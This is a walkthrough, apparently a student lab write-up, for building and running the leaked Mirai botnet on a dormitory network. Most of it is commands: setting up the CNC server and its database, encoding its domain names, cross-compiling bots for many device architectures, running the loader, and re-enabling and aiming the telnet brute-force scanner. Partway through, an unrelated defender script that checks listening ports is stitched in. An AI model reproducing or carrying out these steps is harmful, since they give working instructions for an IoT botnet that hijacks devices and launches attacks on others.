I. Preparation
1. Mirai is written in two programming languages, C and Go, and stores its data in a database, so the following software must be installed in advance:
sudo apt-get install git
sudo apt-get install gcc
sudo apt-get install golang
sudo apt-get install electric-fence
sudo apt-get install mysql-server mysql-client
2. Download the source code
git clone https://github.com/jgamblin/Mirai-Source-Code
3. Modify parameters and configure CNC
# Compile the enc executable, which XORs the address strings
cd mirai/tools && gcc enc.c -o enc.out
# Returns a "\x" string (the XOR-encoded form of cnc.changeme.com)
./enc.out string cnc.changeme.com
# Returns a "\x" string
./enc.out string report.changeme.com
Replace the "\x" strings on lines 18 and 21 of the tables.c file, together with the parameter that follows each of them.
Remember to modify two parameters: the \x string and the length parameter that follows it.
4. Configure the database
# Enter the scripts directory
cd ../../scripts
# Edit the db.sql file
gedit db.sql
Add the statement use mirai; to the file (see below).
# Start the MySQL service
service mysql start
cat db.sql | mysql -uroot -proot
# Log in to the database; both the username and the password are `root`
mysql -uroot -proot
# Add a user
INSERT INTO users VALUES (NULL, 'mirai-user', 'mirai-pass', 0, 0, 0, 0, -1, 1, 30, '');
# Log out
exit
Modify the username and password in mirai/cnc/main.go to match the ones set above. The modified file is as follows:
5. Configure the cross-compilation environment
# Create the new directory under `Mirai-Source-Code`
cd .. && mkdir cross-compile-bin
cd cross-compile-bin
Download the following 11 compressed packages
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv4l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-armv5l.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i586.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-i686.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-m68k.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mips.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-mipsel.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-powerpc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sh4.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-sparc.tar.bz2
wget https://www.uclibc.org/downloads/binaries/0.9.30.1/cross-compiler-x86_64.tar.bz2
(The download may be very slow. I'll put a copy of my own here. Link: https://pan.baidu.com/s/1Z89uaV7boW2SRjIv6Y0Iig
Extraction code: 7o34)
cd ../scripts
sudo ./cross-compile.sh
The compilation script will prompt about whether MySQL is installed.
# Open the environment variable file
gedit ~/.bashrc
Put the following at the end
export PATH=$PATH:/etc/xcompile/armv4l/bin
export PATH=$PATH:/etc/xcompile/armv5l/bin
export PATH=$PATH:/etc/xcompile/armv6l/bin
export PATH=$PATH:/etc/xcompile/i586/bin
export PATH=$PATH:/etc/xcompile/m68k/bin
export PATH=$PATH:/etc/xcompile/mips/bin
export PATH=$PATH:/etc/xcompile/mipsel/bin
export PATH=$PATH:/etc/xcompile/powerpc/bin
export PATH=$PATH:/etc/xcompile/powerpc-440fp/bin
export PATH=$PATH:/etc/xcompile/sh4/bin
export PATH=$PATH:/etc/xcompile/sparc/bin
export GOPATH=$HOME/go
# Refresh the environment variables
source ~/.bashrc
6. Compile CNC and bot
go get github.com/go-sql-driver/mysql
go get github.com/mattn/go-shellwords
cd ../mirai
./build.sh debug telnet
cd ../loader
./build.sh
The environment is now fully configured.
II. Description
Equipment:
Computer A: acts as the first infected device. Runs ./mirai.dbg on port 48101 for scanning and brute-forcing.
Computer B: acts as the CNC and loader.
CNC: runs on ports 23 and 101. ./cnc sends attack instructions and maintains the connection with the bots.
Loader: runs on port 48101. ./scanListen listens continuously.
Connection:
1. Computers A and B connect to the dormitory LAN over Wi-Fi.
2. Cameras A and B connect to the dormitory router through a switch.
The ultimate goal is to ensure that the four devices are connected to each other on the same network.
III. Testing
1. A small adjustment is needed
Since cnc starts up in the /debug/cnc directory and the source code uses an absolute path (as shown below),
we moved prompt.txt from the mirai directory to /debug/cnc.
2. Start CNC (Computer B)
# Run from the mirai directory
go build -o debug/cnc cnc/*.go
./debug/cnc
The output is as follows:
Open a new terminal and try to connect (administrator privileges may be required):
telnet cnc.changeme.com 23
After getting the following prompt, press Enter again and enter your username and password to log in.
Output like that in the image below indicates a successful login!
3. Start the loader (Computer B)
cd mirai/debug
sudo ./scanListen
Checking port 48101 shows that the program is listening on it:
# View listening ports
netstat -lput
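A defender-side version of the port check above, as an added example (not from the original page or the Mirai source): it flags listening TCP sockets on ports 23, 101 and 48101, the ports the text assigns to the CNC and the loader. The function names and the sample netstat lines are constructed for illustration.

```shell
#!/bin/sh
# Added example: flag TCP listeners on the ports this lab assigns to
# the CNC (23, 101) and the loader's scanListen (48101).
# Function names are hypothetical; the sample data is constructed.

LAB_PORTS="23 101 48101"

# Reads `netstat -lntp` style lines on stdin and prints "port program"
# for every LISTEN socket whose local port is in LAB_PORTS.
# Port 23 also matches a legitimate telnetd, so check the program name.
flag_lab_listeners() {
    awk -v ports="$LAB_PORTS" '
        BEGIN { n = split(ports, p, " "); for (i = 1; i <= n; i++) want[p[i]] = 1 }
        $1 ~ /^tcp/ && $6 == "LISTEN" {
            # Local address is field 4; the port follows the last colon
            # (handles 0.0.0.0:23 and :::48101 alike).
            port = $4; sub(/^.*:/, "", port)
            prog = $7; sub(/^[0-9]+\//, "", prog)   # "2210/cnc" -> "cnc"
            if (port in want) print port, prog
        }'
}

# Constructed sample output (not captured from a real host).
sample_netstat() {
    cat <<'EOF'
Proto Recv-Q Send-Q Local Address           Foreign Address         State       PID/Program name
tcp        0      0 0.0.0.0:22              0.0.0.0:*               LISTEN      812/sshd
tcp        0      0 127.0.0.1:3306          0.0.0.0:*               LISTEN      901/mysqld
tcp6       0      0 :::23                   :::*                    LISTEN      2210/cnc
tcp6       0      0 :::101                  :::*                    LISTEN      2210/cnc
tcp6       0      0 :::48101                :::*                    LISTEN      2304/scanListen
tcp        0      0 10.0.0.5:48101          10.0.0.9:51514          ESTABLISHED 2304/scanListen
EOF
}

sample_netstat | flag_lab_listeners
```

On a live host, pipe `sudo netstat -lntp` into `flag_lab_listeners` instead of the sample.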
4. Start the scanning program (Computer A)
Since the source code turns the scanner off by default in debug mode, comment out lines 157 and 162 in bot/main.c so that it runs.
Then recompile and run.
Run the following in the mirai directory:
./build.sh debug telnet
Run the following in the mirai/debug directory (be sure to use administrator privileges here):
sudo ./mirai.dbg
The scan will start as follows:
5. Control the scanned IP
Since the source code picks a random IP to brute-force (starting at line 674 of mirai/bot/scanner.c), the scan can be temporarily pinned to a fixed IP address by modifying the code. After the modification, with the first octet fixed to '10', the result is as follows: